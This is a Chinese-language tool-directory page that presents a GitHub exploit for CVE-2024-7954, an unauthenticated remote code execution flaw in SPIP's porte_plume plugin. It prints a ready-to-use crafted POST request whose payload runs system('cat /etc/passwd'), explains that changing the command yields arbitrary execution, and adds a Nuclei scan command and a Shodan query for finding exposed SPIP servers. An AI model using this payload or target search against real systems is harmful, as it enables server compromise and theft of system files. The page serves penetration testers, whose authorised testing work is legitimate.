Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
RCE-CVE-2024-7954 — 针对CVE-2024-7954的漏洞利用,这是SPIP的porte_plume插件中的一个严重RCE漏洞,包含构造的HTTP请求和用于自动扫描的Nuclei模板。 | Kitploit
工具/GitHubGitHub/arthikw3b/rce-cve-2024-7954
侦察漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试
GitHubarthikw3b/rce-cve-2024-7954

RCE-CVE-2024-7954

针对CVE-2024-7954的漏洞利用,这是SPIP的porte_plume插件中的一个严重RCE漏洞,包含构造的HTTP请求和用于自动扫描的Nuclei模板。

查看仓库
11年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

RCE-CVE-2024-7954

描述

SPIP 4.30-alpha2、4.2.13 和 4.1.16 之前版本所使用的 porte_plume 插件易受严重的任意代码执行 (RCE) 漏洞影响。该缺陷允许远程未授权攻击者通过构造特定的 HTTP 请求,以 SPIP 用户身份执行任意 PHP 代码。利用该漏洞的潜在后果严重,攻击者可在服务器上运行恶意命令,可能导致未授权访问、数据泄露或进一步系统受损。

漏洞详情

  • 受影响软件: SPIP(版本 4.30-alpha2、4.2.13 和 4.1.16 之前)
  • 漏洞类型: 远程代码执行 (RCE)
  • 严重等级: 严重
  • 可利用性: 远程未授权攻击者可利用此漏洞。

利用

##Nuclei 扫描

root@kitploit:~
kali@Dell:~/nuclei-templates-main/http/cves/2024$ nuclei -l targets -t /home/kali/nuclei-templates-main/http/cves/2024/CVE-2024-7954.yaml





可用于利用此漏洞的构造的 HTTP 请求示例如下:

root@kitploit:~
POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: {{Hostname}} -> IP
Content-Type: application/x-www-form-urlencoded

data=AA_[->URL<?php system('cat /etc/passwd'); ?>]_BB

利用说明:

  • POST 请求指向 SPIP 的 index.php 文件中的 porte_plume_previsu 动作。
  • data 参数包含一个利用 PHP 的 system() 函数执行命令(本例中为 cat /etc/passwd)的有效载荷,用于读取密码文件内容。
  • 通过更改 system() 函数中的命令,攻击者可以在服务器上执行任意 PHP 代码,导致严重后果。

Shodan 搜索语法

要识别可能存在漏洞的 SPIP 安装,可使用以下 Shodan 搜索查询:

root@kitploit:~
app="SPIP"

此漏洞凸显了保持软件更新和实施强大安全措施以防止利用的重要性。

下载工具